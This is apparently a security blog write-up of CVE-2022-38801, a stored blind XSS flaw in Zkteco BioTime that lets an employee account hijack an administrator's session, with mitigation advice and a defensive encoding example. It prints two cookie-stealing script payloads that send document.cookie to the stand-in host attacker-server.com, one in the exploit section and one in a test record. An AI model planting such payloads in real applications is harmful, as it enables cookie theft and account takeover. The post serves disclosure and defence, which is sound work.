CVE-2022-38801: Zkteco BioTime < 8.5.3 Build:20200816.447 employee session hijack and cookie theft via blind cross-site scripting vulnerability

Summary: In this long-read post, we'll go over the exploit details of CVE-2022-38801, in which a low-privileged employee account in Zkteco BioTime < 8.5.3 Build:20200816.447 can hijack an administrator's session and steal the administrator's cookies using stored (blind) cross-site scripting (XSS).

Introduction

Zkteco BioTime is a web-based biometrics application designed for time attendance and employee management. Prior to version 8.5.3 Build:20200816.447, an employee can hijack an administrator's session and steal the administrator's cookies through blind cross-site scripting (XSS): the employee stores a script in a field they are allowed to edit, and the script runs later in the administrator's browser. The vulnerability has been assigned CVE-2022-38801.

Cross-Site Scripting (XSS) is a web security vulnerability in which attacker-controlled input is rendered into a page without proper output encoding, so that it executes as script in other users' browsers with those users' privileges. Blind XSS is a stored variant in which the payload fires in a context the attacker cannot see, typically an administrative back-end: the attacker plants the script, cannot observe whether or when it executes, and learns of success only when the payload calls back to a server the attacker controls.

Exploit Details

The exploit takes advantage of employee-supplied data being stored and later rendered in administrator views without output encoding. An employee with access to the system can place a script payload in a field they are permitted to edit, such as a name or an address. When an administrator later views a page that displays that data, the script executes in the administrator's browser within the administrator's authenticated session, which allows cookie theft and session hijacking. The employee never needs to interact with the administrator directly; the application delivers the payload for them.

Code Snippet

This code snippet is a simple example of a blind XSS payload that can be inserted into a user-accessible field; attacker-server.com stands in for a host the attacker controls:

<script>
  // attacker-server.com is a placeholder for a listener the attacker controls.
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    // This branch only runs if the attacker's server answers with CORS headers;
    // a real blind payload would also drop the alert, which would tip off the administrator.
    if (this.readyState == 4 && this.status == 200) {
      alert('Cookies captured!');
    }
  };
  // document.cookie only exposes cookies that lack the HttpOnly flag.
  var cookieData = encodeURIComponent(document.cookie);
  // The GET request reaches the attacker's server even if the cross-origin response cannot be read.
  xhttp.open('GET', 'https://attacker-server.com/log_cookies?data=' + cookieData, true);
  xhttp.send();
</script>

With this script stored in a field, any administrator who views a page that renders that field unencoded will have their non-HttpOnly cookies sent to the attacker's server in the query string of the request. Because the request is sent regardless of whether the browser lets the script read the response, the attacker only needs a listener that logs incoming requests. If the session cookie is among the values received, the attacker can replay it and act as the administrator for as long as the session remains valid.

Original References:

- Zkteco BioTime Official Documentation: https://www.zkteco.com/UploadFile/Website-Download%20Files/Product/FAQ_2_20180727153450.pdf
- CVE-2022-38801 Official Listing: https://nvd.nist.gov/vuln/detail/CVE-2022-38801

Mitigation

There are two primary steps in mitigating this vulnerability:

1. Update Zkteco BioTime: The issue is fixed in version 8.5.3 Build:20200816.447, so updating to that build or a later one removes the vulnerability.

2. Output Encoding and Input Validation: The durable fix is vendor-side, context-aware output encoding of every user-supplied value at the point where it is rendered; input validation on its own is a weaker control, since the same stored value may be emitted into HTML, attribute, and script contexts that each need different encoding. Until the update can be applied, administrators should reduce the impact of a successful injection: mark session cookies HttpOnly, Secure, and SameSite where the deployment allows it so that document.cookie does not expose them, restrict which accounts can edit profile fields, and review stored employee fields for script or event-handler markup that should never appear in a name or address.
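The distinction in point 2 between validating input and encoding output is easiest to see side by side. The following is an added example written for this post, not code from Zkteco BioTime or from the advisory: it renders a constructed employee record into an HTML table row first the vulnerable way (raw string building) and then with HTML output encoding, and provides a check a regression test can use. The record, the field names, the function names, and the use of attacker-server.com as the callback host are assumptions for the demonstration.

```javascript
// Added example, not from the advisory or from Zkteco's code base.
// Constructed employee record as a low-privileged user could store it;
// the "name" field carries a blind-XSS payload of the kind shown above.
const employeeRecord = {
  id: 1042,
  name: "<script>new Image().src='https://attacker-server.com/log_cookies?data='" +
        "+encodeURIComponent(document.cookie)</script>",
  department: 'Sales & "Marketing"',
};

// VULNERABLE: interpolating raw values reproduces the stored payload verbatim,
// so it executes in the browser of whoever renders this row (the administrator).
function renderRowVulnerable(emp) {
  return `<tr><td>${emp.id}</td><td>${emp.name}</td><td>${emp.department}</td></tr>`;
}

// HTML element/attribute encoding of the five characters that can change the
// parsing context. Apply it at output time, not at input time: the same stored
// value may later be emitted into a different context that needs different rules.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// HARDENED: every untrusted value is encoded for the HTML element context.
function renderRowHardened(emp) {
  return `<tr><td>${escapeHtml(emp.id)}</td>` +
         `<td>${escapeHtml(emp.name)}</td>` +
         `<td>${escapeHtml(emp.department)}</td></tr>`;
}

// Regression check: does rendered HTML still contain an executable script tag?
// (An encoded "&lt;script&gt;" is inert text and does not match.)
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// The DOM-API equivalent in a browser is to build cells and assign textContent,
// never innerHTML, e.g.  td.textContent = emp.name;

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable row executes script:', containsScriptTag(renderRowVulnerable(employeeRecord)));
  console.log('hardened row executes script  :', containsScriptTag(renderRowHardened(employeeRecord)));
}
```

The encoding function deliberately covers only the HTML element context. A value placed inside a JavaScript string, a URL, or an inline event handler needs the encoding for that context instead; that is the reason the fix belongs at the rendering site rather than at the form that accepts the field.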

Conclusion

CVE-2022-38801 highlights the importance of encoding untrusted data at output time, backed by input validation. It demonstrates how a low-privileged employee account can plant a blind XSS payload that later runs in an administrator's browser, leading to cookie theft and session hijacking. Updating to Zkteco BioTime 8.5.3 Build:20200816.447 or later, and hardening session cookies so that a script cannot read them, are the essential steps in mitigating this risk.

Timeline

Published on: 11/30/2022 14:15:00 UTC
Last modified on: 12/02/2022 15:12:00 UTC